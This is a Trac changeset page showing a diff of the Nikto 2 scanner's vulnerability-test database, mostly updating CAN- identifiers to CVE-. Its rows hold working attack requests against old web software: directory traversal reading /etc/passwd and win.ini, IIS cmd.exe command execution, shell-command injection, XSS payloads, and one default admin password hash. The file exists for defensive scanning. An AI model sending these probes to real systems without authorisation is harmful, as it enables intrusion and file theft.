+"003208","474","7","/SiteServer/Publishing/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.","",""
 "003209","17671","37","/siteserver/publishing/viewcode.asp?source=/default.asp","GET","200","","","","","May be able to view source code using Site Server vulnerability.","",""
 "003210","4775","7","/shoutbox.php?conf=../../../../../../../etc/passwd","GET","root:","","","","","Webfroot Shoutbox 2.32 and below allows any file to be read from the system.","",""
 …
 "003262","5108","4","/sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>","GET","<script>alert(document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
 "003263","514","8","/isapi/tstisapi.dll","GET","Pi3web","","","","","The test tstisapi.dll is available and can allow attackers to execute commands remotely.","",""
 "003264","524","7","@CGIDIRSbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHPNuke is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320","",""
 "003265","524","7","@NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHPNuke is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320","",""
+"003264","524","7","@CGIDIRSbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHPNuke is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CVE-2001-0320","",""
+"003265","524","7","@NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHPNuke is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CVE-2001-0320","",""
 "003266","5324","7","/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf","GET","SET CLIENT FILE","","","","","Default scripts can allow arbitrary access to the host.","",""
 "003267","5325","7","/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf","GET","Source for file","","","","","Novell web server allows any file on the system to viewed through the viewcode.jsp file","",""
 "003268","534","7","@CGIDIRSustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd","GET","200","","","","","ustorekeeper will display arbitrary files. CAN-2001-0466","",""
 "003269","534","7","@CGIDIRSustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files remotely. CAN-2001-0466.","",""
+"003268","534","7","@CGIDIRSustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd","GET","200","","","","","ustorekeeper will display arbitrary files. CVE-2001-0466","",""
+"003269","534","7","@CGIDIRSustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files remotely. CVE-2001-0466.","",""
 "003270","539","d","/catinfo","GET","200","","","","","May be vulnerable to a buffer overflow. Request '/catinfo?' and add on 2048 of garbage to test.","",""
 "003271","5407","a","/soap/servlet/soaprouter","GET","200","","","","","Oracle 9iAS SOAP components allow anonymous users to deploy applications by default.","",""
 …
 "003292","554","7","@CGIDIRSa1stats/a1disp3.cgi?../../../../../../../etc/passwd","GET","root:","","","","","Remote file retrieval.","",""
 "003293","554","7","@CGIDIRSa1stats/a1disp4.cgi?../../../../../../../etc/passwd","GET","root:","","","","","Remote file retrieval.","",""
 "003294","556","8","/certsrv/..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CAN-2001-0333. BID-2708.","",""
 "003295","556","8","/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CAN-2001-0333. BID-2708.","",""
 "003296","556","8","/iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CAN-2001-0333. BID-2708.","",""
 "003297","556","8","/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CAN-2001-0333. BID-2708.","",""
 "003298","556","8","/pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CAN-2001-0333. BID-2708.","",""
 "003299","556","8","/rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CAN-2001-0333. BID-2708.","",""
 "003300","556","8","/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CAN-2001-0333. BID-2708.","",""
 "003301","556","8","/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver","GET","[Version]","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CAN-2001-0333. BID-2708.","",""
 "003302","556","8","/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CAN-2001-0333. BID-2708.","",""
+"003294","556","8","/certsrv/..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CVE-2001-0333. BID-2708.","",""
+"003295","556","8","/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CVE-2001-0333. BID-2708.","",""
+"003296","556","8","/iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CVE-2001-0333. BID-2708.","",""
+"003297","556","8","/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CVE-2001-0333. BID-2708.","",""
+"003298","556","8","/pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CVE-2001-0333. BID-2708.","",""
+"003299","556","8","/rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CVE-2001-0333. BID-2708.","",""
+"003300","556","8","/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CVE-2001-0333. BID-2708.","",""
+"003301","556","8","/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver","GET","[Version]","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CVE-2001-0333. BID-2708.","",""
+"003302","556","8","/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CVE-2001-0333. BID-2708.","",""
 "003303","562","3","/server-info","GET","200","Server Information","","","","This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.","",""
 "003304","5689","4","@CGIDIRSnamazu.cgi","GET","200","","","","","Namazu search engine found. Vulnerable to CSS attacks (fixed 2001-11-25). Attacker could write arbitrary files outside docroot (fixed 2000-01-26). CA-2000-02.","",""
 …
 "003316","596","3","/dcshop/auth_data/auth_user_file.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.","",""
 "003317","596","3","/dcshop/orders/orders.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.","",""
 "003318","635","8","@CGIDIRSshop.pl/page=;cat%20shop.pl|","GET","\/perl","","","","","Shopping Cart (Hassan) allows execution of remote commands. CAN-2001-0985.","",""
 "003319","641","7","/cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI allows reading of remote files. CAN-2001-1019.","",""
+"003318","635","8","@CGIDIRSshop.pl/page=;cat%20shop.pl|","GET","\/perl","","","","","Shopping Cart (Hassan) allows execution of remote commands. CVE-2001-0985.","",""
+"003319","641","7","/cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI allows reading of remote files. CVE-2001-1019.","",""
 "003320","644","3","/.FBCIndex","GET","Bud2","","","","","This file son OSX contains the source of the files in the directory. http://www.securiteam.com/securitynews/5LP0O005FS.html","",""
 "003321","645","7","@CGIDIRSshopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|","GET","root:","","","","","ShopPlus Cart allows arbitrary command execution. CAN-2001-0992.","",""
 "003322","646","8","@CGIDIRSeshop.pl/seite=;cat%20eshop.pl|","GET","\/perl","","","","","This CGI allows attackers to execute commands on the remote server. CAN-2001-1014.","",""
+"003321","645","7","@CGIDIRSshopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|","GET","root:","","","","","ShopPlus Cart allows arbitrary command execution. CVE-2001-0992.","",""
+"003322","646","8","@CGIDIRSeshop.pl/seite=;cat%20eshop.pl|","GET","\/perl","","","","","This CGI allows attackers to execute commands on the remote server. CVE-2001-1014.","",""
 "003323","6659","4","/JUNK(223)<font%20size=50><script>alert('Vulnerable')</script><!--//--","GET","<script>alert('Vulnerable')</script>","","","","","MyWebServer 1.0.2 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
 "003324","6661","7","@CGIDIRSion-p.exe?page=c:\winnt\repair\sam","GET","200","","","","","Ion-P allows remote file retrieval.","",""
 …
 "003340","6698","8","@CGIDIRSclassifieds/classifieds.cgi","GET","200","","","","","Mike's Classifieds CGI contained a bug allows arbitrary command execution on the server (untested), see http://freshmeat.net/projects/myclassifieds/","",""
 "003341","6699","8","@CGIDIRScalendar/index.cgi","GET","200","","","","","Mike's Calendar CGI contained a bug which allowed arbitrary command execution (version 1.4), see http://freshmeat.net/projects/mycalendar/","",""
 "003342","670","3","/stronghold-info","GET","200","","","","","Redhat Stronghold from versions 2.3 up to 3.0 disclose sensitive information. This gives information on configuration. CAN-2001-0868.","",""
 "003343","670","3","/stronghold-status","GET","200","","","","","Redhat Stronghold from versions 2.3 up to 3.0 disclose sensitive information. CAN-2001-0868.","",""
 "003344","674","3","/blah-whatever.jsp","GET","JSP file \"","","","","","The Apache Tomcat 3.1 server reveals the web root path when requesting a non-existent JSP file. CAN-2000-0759.","",""
 "003345","677","7","/gallery/index.php?include=../../../../../../../../../etc/passwd","GET","root:","","","","","Gallery allows files to be read remotely. CAN-2001-0900.","",""
 "003346","677","7","/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd","GET","root:","","","","","Gallery Addon for PhpNuke allows files to be read remotely. CAN-2001-0900.","",""
+"003342","670","3","/stronghold-info","GET","200","","","","","Redhat Stronghold from versions 2.3 up to 3.0 disclose sensitive information. This gives information on configuration. CVE-2001-0868.","",""
+"003343","670","3","/stronghold-status","GET","200","","","","","Redhat Stronghold from versions 2.3 up to 3.0 disclose sensitive information. CVE-2001-0868.","",""
+"003344","674","3","/blah-whatever.jsp","GET","JSP file \"","","","","","The Apache Tomcat 3.1 server reveals the web root path when requesting a non-existent JSP file. CVE-2000-0759.","",""
+"003345","677","7","/gallery/index.php?include=../../../../../../../../../etc/passwd","GET","root:","","","","","Gallery allows files to be read remotely. CVE-2001-0900.","",""
+"003346","677","7","/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd","GET","root:","","","","","Gallery Addon for PhpNuke allows files to be read remotely. CVE-2001-0900.","",""
 "003347","684","4","@CGIDIRS../../../../../../../../../../WINNT/system32/ipconfig.exe","GET","IP Configuration","","","","","Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands.","",""
 "003348","684","4","@CGIDIRSNUL/../../../../../../../../../WINNT/system32/ipconfig.exe","GET","IP Configuration","","","","","Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands.","",""
 "003349","684","4","@CGIDIRSPRN/../../../../../../../../../WINNT/system32/ipconfig.exe","GET","IP Configuration","","","","","Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands.","",""
 "003350","694","7","/phprocketaddin/?page=../../../../../../../../../../etc/passwd","GET","root:","","","","","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host.","",""
 "003351","698","4","@CGIDIRSstore/agora.cgi?cart_id=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Agora.cgi is vulnerable to Cross Site Scripting (XSS), CAN-2001-1199, CA-2000-02.","",""
+"003351","698","4","@CGIDIRSstore/agora.cgi?cart_id=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Agora.cgi is vulnerable to Cross Site Scripting (XSS), CVE-2001-1199, CA-2000-02.","",""
 "003352","7","6","/iissamples/exair/howitworks/Code.asp","GET","200","","","","","Scripts within the Exair package on IIS 4 can be used for a DoS against the server. CVE-1999-0449. BID-193.","",""
 "003353","7","6","/iissamples/exair/howitworks/Codebrw1.asp","GET","200","","","","","This is a default IIS script/file which should be  removed, it may allow a DoS against the server. CAN-1999-0738. MS99-013. CVE-1999-0449. BID-193.","",""
 "003354","7","7","/msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini","GET","[fonts]","","","","","This allows attackers to read arbitrary files on the host. CAN-1999-0736. MS99-013.","",""
+"003353","7","6","/iissamples/exair/howitworks/Codebrw1.asp","GET","200","","","","","This is a default IIS script/file which should be  removed, it may allow a DoS against the server. CVE-1999-0738. MS99-013. CVE-1999-0449. BID-193.","",""
+"003354","7","7","/msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini","GET","[fonts]","","","","","This allows attackers to read arbitrary files on the host. CVE-1999-0736. MS99-013.","",""
 "003355","701","4","/pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
 "003356","701","4","/pls/help/<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
 …
 "003370","724","8","/ans.pl?p=../../../../../usr/bin/id|&blah","GET","uid","","","","","Avenger's News System allows commands to be issued remotely.  http://ans.gq.nu/ default admin string 'admin:aaLR8vE.jjhss:root@127.0.0.1', password file location 'ans_data/ans.passwd'","",""
 "003371","724","8","/ans/ans.pl?p=../../../../../usr/bin/id|&blah","GET","uid","","","","","Avenger's News System allows commands to be issued remotely.","",""
 "003372","761","8","@CGIDIRScsSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`","GET","root:","","","","","csSearch (http://www.cgiscript.net/) has a major flaw which allows perl to be executed remotely. Upgrade to a version higher than 2.3. CAN-2002-0495.","",""
+"003372","761","8","@CGIDIRScsSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`","GET","root:","","","","","csSearch (http://www.cgiscript.net/) has a major flaw which allows perl to be executed remotely. Upgrade to a version higher than 2.3. CVE-2002-0495.","",""
 "003373","768","3","/?\"><script>alert('Vulnerable');</script>","GET","<script>alert('Vulnerable')</script>","","","","","IIS is vulnerable to Cross Site Scripting (XSS). See MS02-018, CVE-2002-0075, SNS-49, CA-2002-09","",""
 "003374","3341","3","/JUNK(10)abcd.html","GET","+ displayresult +","","","","","The IIS 4.0, 5.0 and 5.1 server may be vulnerable to Cross Site Scripting (XSS) in redirect error messages.","",""
 …
 "003376","783","36","/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa","GET","OBJECT RUNAT=Server","","","","","ServletExec 4.1 ISAPI Java Servlet/JSP Engine for IIS can reveal source code. The server may also be vulnerable to a DoS attack by requesting a long file name ending in .jsp","",""
 "003377","784","36","/servlet/com.newatlanta.servletexec.JSP10Servlet/","GET","The file was not found","","","","","ServletExec 4.1 ISAPI Java Servlet/JSP Engine for IIS discloses the web root. The server may also be vulnerable to a DoS attack by requesting a long file name ending in .jsp","",""
 "003378","789","3","/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp","GET","Path not found","","","","","CodeBrws.asp can be used to determine if a file system path exists or not. CAN-1999-0739. MS99-013.","",""
 "003379","789","5","/iissamples/sdk/asp/docs/codebrws.asp","GET","View Active Server Page Source","","","","","IIS 5 comes with an ASP that allows remote code to viewed. All default files in /IISSamples should be removed. CAN-1999-0739. MS99-013.","",""
 "003380","789","5","/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp","GET","200","","","","","IIS may be vulnerable to source code viewing via the example CodeBrws.asp file. Remove all default files from the web root. CAN-1999-0739. MS99-013.","",""
 "003381","859","7","/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini","GET","[windows]","","","","","Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CAN-2002-0661.","",""
 "003382","859","7","/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","GET","[fonts]","","","","","Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CAN-2002-0661.","",""
+"003378","789","3","/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp","GET","Path not found","","","","","CodeBrws.asp can be used to determine if a file system path exists or not. CVE-1999-0739. MS99-013.","",""
+"003379","789","5","/iissamples/sdk/asp/docs/codebrws.asp","GET","View Active Server Page Source","","","","","IIS 5 comes with an ASP that allows remote code to viewed. All default files in /IISSamples should be removed. CVE-1999-0739. MS99-013.","",""
+"003380","789","5","/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp","GET","200","","","","","IIS may be vulnerable to source code viewing via the example CodeBrws.asp file. Remove all default files from the web root. CVE-1999-0739. MS99-013.","",""
+"003381","859","7","/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini","GET","[windows]","","","","","Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CVE-2002-0661.","",""
+"003382","859","7","/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","GET","[fonts]","","","","","Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CVE-2002-0661.","",""
 "003383","96","7","/iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","[fonts]","","","","","This allows arbitrary files to be retrieved from the server, it may allow a DoS against the server. CVE-1999-0449. BID-193. MS01-033.","",""
 "003384","96","7","/iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","[fonts]","","","","","This allows arbitrary files to be retrieved from the server, it may allow a DoS against the server. CVE-1999-0449. BID-193. MS01-033.","",""
 …
 "006184","3093","1","/includes/db.inc","GET","200","<?php","","","","Include files (.inc) should not be served in plain text.","",""
 "006185","3093","1","/includes/sendmail.inc","GET","200","<?php","","","","Include files (.inc) should not be served in plain text.","",""
+"006186","","3","/wp-app.log","GET","Array","LANG","","","","Wordpress' wp-app.log may leak application/system details.","",""
+"006186","3092","1b","/license.txt","GET","200","","","","","License file found may identify site software.","",""
+"006187","3092","1b","/install.txt","GET","200","","","","","Install file found may identify site software.","",""
+"006188","3092","1b","/LICENSE.TXT","GET","200","","","","","License file found may identify site software.","",""
+"006189","3092","1b","/INSTALL.TXT","GET","200","","","","","Install file found may identify site software.","",""
+"006190","3092","1b","/READ_THIS_FIRST.txt","GET","Welcome to ExpressionEngine","","","","","An ExpressionEngine readme file has been found.","",""
+"006191","","3","/wp-app.log","GET","Array","LANG","","","","Wordpress' wp-app.log may leak application/system details.","",""

Note: See TracChangeset for help on using the changeset viewer.

Nikto 2

Context Navigation

Changeset 332

Legend:

trunk/plugins/db_tests

Download in other formats: